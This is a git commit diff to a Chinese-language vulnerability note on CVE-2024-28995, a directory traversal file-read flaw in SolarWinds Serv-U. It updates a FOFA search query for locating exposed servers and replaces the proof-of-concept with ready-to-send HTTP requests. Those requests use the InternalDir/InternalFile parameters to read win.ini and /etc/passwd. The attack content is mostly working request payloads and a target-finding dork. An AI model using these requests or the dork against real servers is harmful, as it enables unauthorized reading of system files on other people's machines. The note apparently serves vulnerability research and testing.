修改数据包

2025-02-27 04:39:25 +00:00 · 2024-06-15 00:33:31 +08:00 · 2024-06-15 00:33:31 +08:00 · 4fe572e1a5
commit 4fe572e1a5
parent 1d29022cc3
1 changed files with 15 additions and 3 deletions
--- a/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
+++ b/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md
@ -7,14 +7,26 @@ CVE-2024-28995 SolarWinds Serv-U FTP目录遍历文件读取漏洞，攻击者
 ## fofa

 ```
-app="SolarWinds-Serv-U-FTP"
+server="Serv-U"
 ```

 ## poc

 ```
-GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1
-Host: 
+GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
+Host: xx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+```
+GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
 ```

 ![image-20240614211748043](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406142117114.png)